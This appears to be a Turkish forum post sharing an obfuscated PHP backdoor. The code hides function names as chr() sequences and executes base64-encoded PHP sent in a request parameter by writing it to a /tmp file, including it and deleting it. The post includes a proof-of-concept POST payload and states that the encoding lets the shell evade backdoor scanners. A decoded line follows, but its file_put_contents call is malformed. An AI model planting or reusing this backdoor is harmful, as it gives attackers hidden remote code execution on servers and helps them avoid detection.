Php Backdoor Yeni
-
<?php $b = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$c = $_REQUEST["d1"];$c1 = chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$d = chr(47).chr(116).chr(109).chr(112).chr(47).chr(102).chr(103).chr(100).chr(102).chr(103).chr(100).chr(102).chr(103);$d1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);$f = chr(117).chr(110).chr(108).chr(105).chr(110).chr(107);$c1($d,$d1.$b($c));include($d);$f($d); ?>
kodumuz yukarıda görüldüğü gibi char ile encode edilmiş bir backdoor ne işe yarar diyorsanız base64 ile encode edilmiş bir php kodunu post ederseniz otomatik olarak sunucuda php kodunu çalıştırırsınız. Sunucunuzda Böyle bir shell varsa backdoor scanner bunu yakalamaz.
Poc Post d1=PD8gZWNobydnb3RlZ2VsZGlhc2tpbWl6JzsgPz4=
server.php?d1=/tmp/fgdfgdfg
İstekleri yollarsanız hiçbir shell scannera yakalanmadan post işlemlerini başaralı şekilde yaparsanız.
-
-
/*** $b = "base64_decode"; $c1 = "file_put_contents"; $d = "/tmp/fgdfgdfg"; $d1 = "<?php"; $f = "unlink"; $c1($d, $d1 . $b($c)); ***/ file_put_contents("/tmp/fgdfgdfg", "<?php", base64_decode($_REQUEST["d1"])); include("/tmp/fgdfgdfg"); unlink("/tmp/fgdfgdfg");
-
Mobile de olduğum için deneylemiyorum , deneyen ve olumlu sonuç alan arkadaş oldu mu ?
olduysa kodları paylaşırsa akşam bir denemek isterim.